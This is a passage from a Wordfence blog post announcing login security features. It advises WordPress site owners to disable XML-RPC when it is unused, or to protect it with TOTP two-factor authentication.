Because XML-RPC is such a popular target for attackers, we strongly recommend that you figure out whether you need it or not. If you do, protect it with 2FA if possible. If you don’t use the WordPress app or the Jetpack plugin it is likely safe for you to disable XML-RPC.

If you don’t need it, disable it. Once you know it is safe to do so, disabling it is as easy as checking a box in your Wordfence settings. Just be aware that it may cause you problems in the future should you start using an app or plugin that requires it.

Two-Factor Authentication for XML-RPC

If you have a custom application that logs in via XML-RPC, it can be configured to append a TOTP code when logging in using Wordfence. This option allows you to protect your XML-RPC endpoint from brute force attacks while making it available for your custom app. Unfortunately most off-the-shelf plugins and apps that utilize XML-RPC cannot be configured to use 2FA just yet, but with Wordfence you’ll be ready for when they can.

Conclusion

In this age of massive botnets and constant data breaches, login security has become increasingly important. These new features combined with our existing ones will provide you with the tools you need to implement the layered security approach that will keep your site safe. We strongly recommend that you upgrade to the latest version of Wordfence if you haven’t done so already, and invest the time to enable these powerful new features.

Thanks and stay safe!

The post Announcing 3 New Login Security Features appeared first on Wordfence.

Read More
Page 2 of 1,017«12345»102030...Last »